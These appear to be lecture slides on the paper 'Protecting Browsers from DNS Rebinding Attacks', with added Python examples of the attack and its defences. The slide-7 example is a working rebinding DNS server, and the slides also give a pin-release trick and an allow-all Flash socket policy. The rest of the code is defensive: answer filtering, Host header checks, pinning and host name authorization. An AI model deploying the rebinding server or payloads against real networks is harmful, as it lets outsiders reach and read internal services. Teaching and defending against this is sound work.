1. Protecting Browsers from DNS Rebinding Attacks
Collin Jackson, Adam Barth, Andrew Bortz, Weidong Shao, Dan Boneh
Presented by: Felipe Mattosinho
2. Outline
Introduction
How DNS Rebinding Works
DNS Rebinding Vulnerabilities
Attacks using DNS Rebinding
Defenses Against Rebinding
Related Work
3. Introduction
Browsers and DNS Caching
Why do browsers cache DNS results at all?
Different browsers use different caching policies, e.g. Firefox, Safari and Internet Explorer each behave differently.
The TTL of a DNS record states how long the entry is valid.
Browsers "should" cache an entry until its TTL expires.
4. Introduction
Browsers Same Origin Policy
The browser tries to stop client-side script served from one origin from reading or modifying content that belongs to a different origin.
The policy applies to network access and to browser state such as the DOM interface, cookies, cache, history, and the password database.
Same origin means the same protocol, host name and port number.
Examples: Wikipedia, http://en.wikipedia.org/wiki/Same_origin_policy
5. Introduction
Browsers Same Origin Policy
Access within the same origin: plug-ins such as Flash Player and Java can open network sockets to their own origin directly.
Access between different origins: Flash Player lets a movie read back HTTP responses from another origin only if that server publishes an XML cross-domain policy allowing it.
Prohibited access (ports the browser refuses to connect to):
Internet Explorer 7: FTP 21, SMTP 25, POP3 110, NNTP 119, IMAP 143
Firefox 2: FTP 21, SMTP 25, POP3 110, NNTP 119, IMAP 143, plus 51 additional ports
Safari 2: no ports are blocked
6. How DNS Rebinding Works
(Diagram) Bob visits www.SE-ROCKS.com, which shows a "Win a car" advertisement served from www.badguy.com.
Bob's ISP resolver asks the attacker's name server for www.badguy.com and receives IP 1.2.3.4 with a TTL of 2 s.
The advertisement delivers malicious JavaScript to Bob's browser. Alice is a machine on Bob's internal network.
7. How DNS Rebinding Works
(Diagram) Bob's browser (IP 10.1.1.2) runs the JavaScript, which waits until the 2 s TTL has expired and then reconnects to www.badguy.com.
The name now resolves to IP 10.1.1.3, which is Alice, so the request goes to Alice's machine while the browser still treats the response as belonging to the www.badguy.com origin.
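The authoritative name server behind the two diagrams above, as an added example (this is not code from the slides or from [JBB+07]): a minimal DNS responder that gives each resolver the attacker's address on its first lookup of www.badguy.com and the intranet target's address on every later lookup. The name, both addresses and the 2 s TTL are the values from the diagram; the wire-format helpers and the per-source state are assumptions of this example. The victim's browser never talks to this server directly, the lookups arrive from the victim's recursive resolver (the ISP in the diagram), which is why the state is keyed by the source address of the query.

```python
import struct

# Values from the slides' diagram; everything else in this example is constructed.
ATTACKER_NAME = "www.badguy.com"
ATTACKER_IP = "1.2.3.4"      # first answer: the attacker's own web server
TARGET_IP = "10.1.1.3"       # later answers: Alice, on the victim's intranet
REBIND_TTL = 2               # seconds; the page re-requests once this expires
A_RECORD, IN_CLASS = 1, 1


def encode_name(name: str) -> bytes:
    """Host name -> DNS wire labels (length-prefixed, terminated by a zero byte)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("bad label length")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def _read_name(packet: bytes, pos: int):
    """Decode a (possibly compressed) name; return (name, position after it)."""
    labels, end = [], None
    while True:
        length = packet[pos]
        if length & 0xC0 == 0xC0:                     # compression pointer
            if end is None:
                end = pos + 2
            pos = struct.unpack("!H", packet[pos:pos + 2])[0] & 0x3FFF
            continue
        pos += 1
        if length == 0:
            break
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    return ".".join(labels), (pos if end is None else end)


def build_query(txid: int, name: str, qtype: int = A_RECORD) -> bytes:
    """Recursive query with one question, as a resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, IN_CLASS)


def parse_query(packet: bytes):
    """Return (txid, qname, qtype) of a single-question query."""
    txid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, pos = _read_name(packet, 12)
    qtype, _qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return txid, qname, qtype


def build_a_response(txid: int, qname: str, ip: str, ttl: int) -> bytes:
    """Authoritative answer (QR=1, AA=1) carrying a single A record."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 0, 0)
    question = encode_name(qname) + struct.pack("!HH", A_RECORD, IN_CLASS)
    rdata = bytes(int(octet) for octet in ip.split("."))
    # 0xC00C is a pointer to the question name at offset 12 (standard compression).
    answer = b"\xc0\x0c" + struct.pack("!HHIH", A_RECORD, IN_CLASS, ttl, 4) + rdata
    return header + question + answer


def parse_a_response(packet: bytes):
    """Return (txid, ip, ttl) from the first answer record of an A response."""
    txid, _flags, _qd, ancount = struct.unpack("!HHHH", packet[:8])
    if ancount < 1:
        raise ValueError("no answer records")
    _qname, pos = _read_name(packet, 12)
    pos += 4                                          # skip qtype, qclass
    _owner, pos = _read_name(packet, pos)
    rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", packet[pos:pos + 10])
    pos += 10
    if rtype != A_RECORD or rdlen != 4:
        raise ValueError("not an A record")
    return txid, ".".join(str(b) for b in packet[pos:pos + 4]), ttl


def response_rcode(packet: bytes) -> int:
    """RCODE from the flags word (3 = NXDOMAIN)."""
    return struct.unpack("!H", packet[2:4])[0] & 0x0F


class RebindingServer:
    """First lookup from a source gets the attacker's IP, every later one the target's.

    Queries come from the victim's recursive resolver, so state is keyed by the
    query's source address; the short TTL makes that resolver come back soon.
    """

    def __init__(self):
        self.served_attacker = set()

    def answer(self, source_ip: str, query: bytes) -> bytes:
        txid, qname, qtype = parse_query(query)
        if qname.lower() != ATTACKER_NAME or qtype != A_RECORD:
            # Authoritative NXDOMAIN (RCODE 3) echoing the question section.
            return struct.pack("!HHHHHH", txid, 0x8403, 1, 0, 0, 0) + query[12:]
        if source_ip not in self.served_attacker:
            self.served_attacker.add(source_ip)
            return build_a_response(txid, qname, ATTACKER_IP, REBIND_TTL)
        return build_a_response(txid, qname, TARGET_IP, REBIND_TTL)
```

To turn this into a live server one would bind a UDP socket on port 53 for the attacker's zone and pass each datagram and its source address to `RebindingServer.answer`; the page served at 1.2.3.4 then only needs to wait longer than `REBIND_TTL` before issuing its XMLHttpRequest to www.badguy.com. Note that a resolver that ignores very small TTLs (many clamp to a minimum) simply returns the cached 1.2.3.4, which is the "browsers should cache until the TTL expires" assumption from the introduction failing in the attacker's disfavour.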
8. DNS Rebinding Vulnerabilities
Standard Rebinding Vulnerabilities
Multiple A Records
Several IP addresses are returned for the same host name.
In 1996, the first attack used this to confuse the security policy of the JVM: a Java applet served from the attacker's web server could also connect to the target, because both addresses belonged to the applet's host name.
Time-Varying DNS
In 2001, the original attack on Java was extended, this time using JavaScript.
The attacker serves www.badguy.com with a very short TTL.
After the attacker rebinds www.badguy.com to the target's IP address, the page's XMLHttpRequest to www.badguy.com reaches the target's server, and the script may read the response because the origin (host name) has not changed.
9. DNS Rebinding Vulnerabilities
Standard Rebinding Vulnerabilities
Pinning in Current Browsers
The browser pins a host name to the IP address it first obtained.
Internet Explorer 7 pins a host name to an IP address for 30 minutes by default. With multiple A records, however, the browser can be made to try a different IP address within 1 second.
Internet Explorer 6 also pins for 30 minutes. The pin is easily released by embedding an image from a closed port on the attacker's server, e.g. <img src="http://badguy.com:81/">: the failed connection drops the pin.
Firefox 1.5 and 2 cache DNS entries for 60 to 120 seconds.
Opera 9 behaves like Internet Explorer 6, but holds a pin for 12 minutes.
Safari 2 pins DNS bindings for 1 second.
10. DNS Rebinding Vulnerabilities
Standard Rebinding Vulnerabilities
Flash Player 9
Flash Player is installed in 55.8% of web browsers (as of December 2006) according to Adobe [1]; the experiment in [JBB+07] instead found Flash Player 9 on 86.9% of impressions.
To open a raw socket to www.badguy.com on a port below 1024, Flash Player 9 first connects to that host and automatically sends <policy-file-request />. The attacker replies with the following XML policy, which allows access to every port [JBB+07]:
<cross-domain-policy><allow-access-from domain="*" to-ports="*" /></cross-domain-policy>
The policy is remembered for the host name, so it still applies after www.badguy.com has been rebound to the target, and the movie can then open sockets to any port on the target.
11. Attacks using DNS Rebinding
Attacks
Firewall Circumvention
  Spidering the intranet
  Compromising unpatched machines
  Abusing internal open services
IP Hijacking
  Committing click fraud
  Sending spam
  Defeating IP-based authentication
  Framing clients
12. Attacks using DNS Rebinding
Experiment: Recruiting Browsers
DNS Rebinding was tested running a Flash Player 9 advertisement
Two machines ran during three successive nights.
The attacker ran:
1. A custom authoritative DNS server
2. A custom Flash player policy server
3. An Apache Web server hosting the advertisement
The target ran an Apache Server to log successful attacks
13. Attacks using DNS Rebinding
Experiment: Recruiting Browsers
The attack needed no user click.
The attack results are tabulated in [JBB+07].
14. Attacks using DNS Rebinding
Experiment: Recruiting Browsers
Relevant numbers from the attack:
1. 50,951 impressions from 44,924 unique IP addresses were acquired (40.2% IE7, 32.3% IE6, 23.5% Firefox, 4% other).
2. The rebinding experiment ran on the 44,301 impressions (86.9%) that reported Flash Player 9.
3. The experiment succeeded on 30,636 impressions (60.1%) from 27,840 unique IP addresses.
4. The attack was less successful on Mac OS.
15. Defenses Against Rebinding
Fixing Firewall Circumvention
Enterprise
Block outbound traffic on port 53 so that clients can only use the enterprise resolver, and configure that resolver to never bind external host names to internal IP addresses.
Use dnswall to enforce this policy.
Consumer
Consumer firewalls already expose a caching DNS resolver and can be augmented with dnswall.
Software
E.g. Windows Firewall can block DNS resolutions to 127.*.*.*, protecting services that bind only to the loopback interface.
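The resolver-side rule that dnswall enforces, as an added example (this is not dnswall's code or code from the slides): given the name a client asked for and the records that came back, drop any A or AAAA record that maps an external name to an internal, loopback or link-local address, while leaving names from the organisation's own zones alone. The internal zone list and the record tuples are assumptions of this example; the address ranges are the standard private ranges.

```python
import ipaddress

# Address space a resolver should never hand out for an external name.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local
    "::1/128", "fc00::/7", "fe80::/10",                # IPv6 equivalents
)]

# Assumed for this example: zones whose names legitimately map into internal space.
INTERNAL_ZONES = ("corp.example",)


def is_internal_address(ip: str) -> bool:
    """True if ip falls into one of the protected ranges (v4 or v6)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETWORKS)


def is_internal_name(name: str) -> bool:
    """True if name is one of our own zones or lies below one of them."""
    n = name.lower().rstrip(".")
    return any(n == zone or n.endswith("." + zone) for zone in INTERNAL_ZONES)


def filter_answers(qname: str, answers):
    """Apply the dnswall rule to one response.

    answers is a list of (rrtype, rdata) tuples returned for qname.  A and
    AAAA records that point an external name at an internal address are
    dropped; everything else passes through.  The decision is made on the
    name the client asked for, so an external name that CNAMEs to an
    internal one cannot smuggle the internal address through.
    Returns (kept, dropped).
    """
    kept, dropped = [], []
    external = not is_internal_name(qname)
    for rrtype, rdata in answers:
        if rrtype in ("A", "AAAA") and external and is_internal_address(rdata):
            dropped.append((rrtype, rdata))
        else:
            kept.append((rrtype, rdata))
    return kept, dropped
```

Dropping the offending records (rather than refusing the whole query) keeps the attacker's external address usable, so legitimate sites that happen to mix public and private records keep working for the public part; a stricter deployment may prefer to return an empty answer for any response that contained a dropped record.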
16. Defenses Against Rebinding
Fixing Plug-ins
Flash Player
Honor a socket policy only if it was obtained from the same IP address and the same host name as the socket being opened.
Request the policy before opening sockets to any port, not only to ports below 1024.
Java
The connect method is used to obtain a proxied socket connection to an external machine.
Java LiveConnect
Remove multi-pin vulnerabilities by making LiveConnect use the same DNS cache as the browser instead of its own.
17. Defenses Against Rebinding
Fixing Browsers (Default-Deny Sockets)
Checking the Host Header
The server accepts only the Host header values it expects; a rebinding request always carries the attacker's host name.
Finer-grained Origins
Refine the origin by adding information such as the server's IP address or its public key.
IP addresses: robust, but some applications break, e.g. Gmail, which serves one host name from many IP addresses.
Public keys: for HTTPS the origin could include the server's public key, but this raises the question of whether two HTTPS pages served from the same domain with different keys may read each other's state.
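The Host header check from this slide, as an added example (not code from the slides or [JBB+07]): a small HTTP handler that refuses any request whose Host header is not on an allow-list. The allow-list, the service name and the port are assumptions of this example. The normalisation matters in practice: a browser may send the header with a port, in mixed case, or as an IPv6 literal in brackets, and an unexpected or missing header must be rejected rather than tolerated.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed allow-list for this example: the names (and IP literals, if clients
# use them) under which the internal service is legitimately reached.
ALLOWED_HOSTS = ("intranet.corp.example", "127.0.0.1", "[::1]")


def normalize_host(host_header: str) -> str:
    """Case-fold, drop a trailing dot and an explicit :port; keep IPv6 brackets."""
    h = host_header.strip().lower()
    if h.startswith("["):                      # IPv6 literal: [::1] or [::1]:8080
        end = h.find("]")
        if end < 0:
            raise ValueError("unterminated IPv6 literal")
        return h[:end + 1]
    if ":" in h:                               # name:port or v4:port
        h = h.rsplit(":", 1)[0]
    return h.rstrip(".")


def host_allowed(host_header, allowed=ALLOWED_HOSTS) -> bool:
    """True only for an expected Host; missing or malformed headers are rejected."""
    if not host_header:
        return False
    try:
        return normalize_host(host_header) in {normalize_host(a) for a in allowed}
    except ValueError:
        return False


class HostCheckingHandler(BaseHTTPRequestHandler):
    """Refuses requests whose Host header is not on the allow-list."""

    def do_GET(self):
        if not host_allowed(self.headers.get("Host")):
            self.send_error(400, "Unexpected Host header")
            return
        body = b"internal service\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Listens on the loopback interface; the same check protects a LAN-bound service.
    HTTPServer(("127.0.0.1", 8080), HostCheckingHandler).serve_forever()
```

A rebound request from the attacker's page arrives with `Host: www.badguy.com` and is answered with 400 before any application code runs; the check costs nothing when the service is always addressed by its real name, and services that are legitimately reached by IP literal simply list those literals too.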
18. Defenses Against Rebinding
Fixing Browsers (Default-Deny Sockets)
Smarter Pinning
Robustness vs. security: longer or wider pins stop more rebinding but break more sites that legitimately move between addresses.
Extend the width of pins: instead of pinning a host name to the single address 171.64.78.10, pin it to the prefix 171.64.78.*, so a rebinding to a different network is refused while switching between servers in the same /24 still works.
The developers of NoScript for Firefox are planning this pinning heuristic.
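The pinning heuristic of this slide, as an added example (this is not code from the slides, from [JBB+07] or from NoScript): a pin table with an adjustable prefix width and an injectable clock, so both the exact-address pin and the widened /24 pin can be exercised offline. The 30-minute default mirrors the Internet Explorer 7 figure from slide 9; the addresses are the ones used in the slides. The table also encodes the two pitfalls from slide 9: a pin is never released by a failed connection, and a non-matching address from a multiple-A-record answer is never used as a fallback.

```python
import ipaddress
import time


class PinTable:
    """Pin host name -> network for pin_seconds; refuse answers outside the pin."""

    def __init__(self, prefix_len=32, pin_seconds=1800, clock=time.monotonic):
        self.prefix_len = prefix_len      # 32 = exact address, 24 = the slide's widened pin
        self.pin_seconds = pin_seconds    # 1800 s mirrors IE7's 30-minute default
        self.clock = clock                # injectable so the behaviour can be tested offline
        self.pins = {}                    # host -> (network, expiry)

    def _network(self, ip: str):
        addr = ipaddress.ip_address(ip)
        if addr.version == 6:             # widening is an IPv4 heuristic; pin v6 exactly
            return ipaddress.ip_network(addr)
        return ipaddress.ip_network(f"{ip}/{self.prefix_len}", strict=False)

    def choose(self, host: str, candidate_ips):
        """Given the fresh DNS answer for host, return the address the browser may
        connect to, or None if every candidate lies outside a live pin.

        While a pin is live only candidates inside the pinned network are
        acceptable.  A connection failure must not release the pin, and the
        caller must not fall back to a non-matching A record; either would
        reintroduce the IE6 and multiple-A-record weaknesses from slide 9.
        """
        host = host.lower().rstrip(".")
        now = self.clock()
        pin = self.pins.get(host)
        if pin is not None and pin[1] > now:
            network = pin[0]
            for ip in candidate_ips:
                if ipaddress.ip_address(ip) in network:
                    return ip
            return None
        if not candidate_ips:
            return None
        first = candidate_ips[0]
        self.pins[host] = (self._network(first), now + self.pin_seconds)
        return first
```

With `prefix_len=32` the table behaves like a strict IE7-style pin; with `prefix_len=24` it accepts the 171.64.78.10 to 171.64.78.20 move the slide has in mind but still refuses a jump to 10.1.1.3. The price of widening is that an attacker who controls two addresses in the same /24 as the target (a shared hosting provider, a cloud tenant on the same subnet) is not stopped, which is the robustness-versus-security trade-off the slide names.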
19. Defenses Against Rebinding
Fixing Browsers(Default-Deny Sockets)
Policy-based Pinning
Browsers consult server-supplied policies to determine when it is safe to re-pin a host name to a new address.
Pinning Pitfalls
Common pin database: the browser and every plug-in must share one pin database, otherwise an attacker can combine differing pins from different components (multi-pin).
Cache: the browser's cache and all plug-in caches must be modified as well to prevent rebinding attacks.
document.domain: pages that relax their origin with document.domain must be handled consistently by the pinning policy too.
20. Defenses Against Rebinding
Fixing Browsers(Default-Allow Sockets)
Host Name Authorization
"Honest machines" do not advertise host names controlled by attackers: the owner of an IP address publishes, in the reverse zone for that address, which host names may be used to reach it.
[JBB+07]
Policy mechanism steps:
1. Reverse the octets of the IP address and resolve the host name auth.<reversed-ip>.in-addr.arpa.
2. Does that host name exist? If not, the address has not opted in and the browser falls back to legacy behaviour.
3. If the IP is policy-enabled, resolve the host name www.example.com.auth.<reversed-ip>.in-addr.arpa.
4. The host name is authorized for that address only if this second name exists.
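The four-step policy lookup above, as an added example (this is not code from the slides or from [JBB+07]): the reverse-zone name construction, the authorization decision, and the browser-side default-allow rule. The zone contents and the stand-in resolver are constructed for this example; in the scheme the reverse zone for 10.1.1.3 is controlled by whoever owns that address, which is why www.badguy.com cannot authorize itself for Alice's machine.

```python
# Constructed reverse-zone data for this example (not real DNS).  The owner of
# 10.1.1.3 has opted in and lists exactly one authorized host name; the owner
# of 1.2.3.4 has published nothing at all.
CONSTRUCTED_ZONE = {
    "auth.3.1.1.10.in-addr.arpa": "127.0.0.1",
    "intranet.corp.example.auth.3.1.1.10.in-addr.arpa": "127.0.0.1",
}


def constructed_resolve(name: str):
    """Stand-in resolver: the record for name, or None for a non-existent name."""
    return CONSTRUCTED_ZONE.get(name.lower().rstrip("."))


def reverse_name(ip: str) -> str:
    """1.2.3.4 -> 4.3.2.1.in-addr.arpa"""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError("IPv4 dotted quad expected")
    return ".".join(reversed(octets)) + ".in-addr.arpa"


def authorize(host: str, ip: str, resolve=constructed_resolve) -> str:
    """Host name authorization, steps 1 to 4 of the slide.

    Returns "no-policy" if the owner of ip has not opted in (step 2 fails),
    "authorized" if <host>.auth.<reversed-ip>.in-addr.arpa exists (step 4),
    and "denied" otherwise.
    """
    rev = reverse_name(ip)
    if resolve("auth." + rev) is None:                  # steps 1 and 2
        return "no-policy"
    probe = host.lower().rstrip(".") + ".auth." + rev   # step 3
    if len(probe) > 253:                                # cannot exist as a DNS name
        return "denied"
    return "authorized" if resolve(probe) is not None else "denied"   # step 4


def may_connect(host: str, ip: str, resolve=constructed_resolve, legacy_allow=True) -> bool:
    """Browser-side rule for default-allow sockets: refuse only on an explicit miss.

    Addresses that have not opted in keep today's behaviour (legacy_allow),
    so deployment is incremental; a browser with default-deny sockets would
    pass legacy_allow=False.
    """
    verdict = authorize(host, ip, resolve)
    if verdict == "no-policy":
        return legacy_allow
    return verdict == "authorized"
```

The scheme needs two extra lookups per new (host, address) pair, and both results can be cached for their TTL; the attacker gains nothing from short TTLs here, because the names being resolved live under in-addr.arpa for the target's address rather than under the attacker's zone.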
21. Related Work
Using Browsers as Bots
Visitors' browsers can be used for a distributed denial of service attack.
Sender Policy Framework
Stores policy information in DNS, the same approach that host name authorization takes for addresses.
22. References
[1] Adobe. Adobe Player Penetration. http://www.adobe.com/products/player_census/flashplayer
[2] Dan Kaminsky. Black Ops 2007: Design Reviewing the Web. Slides, www.doxpara.com/slides/DMK_BO2K7_Web.ppt
[3] Wikipedia. Domain Name System. http://en.wikipedia.org/wiki/Domain_Name_System
[4] Google Safe Browsing for Firefox, 2005. http://www.google.com/tools/firefox/safebrowsing
[5] J. Ruderman. JavaScript Security: Same Origin. http://www.mozilla.org/projects/security/components/same-origin.html
[6] D. Ross. Notes on DNS Pinning, 2007. http://blogs.msdn.com/dross/archive/2007/07/09/notes-on-dns.pinning.aspx
[JBB+07] C. Jackson, A. Barth, A. Bortz, W. Shao, D. Boneh. Protecting Browsers from DNS Rebinding Attacks. ACM CCS 2007.
Supervisor: Gert Pfeifer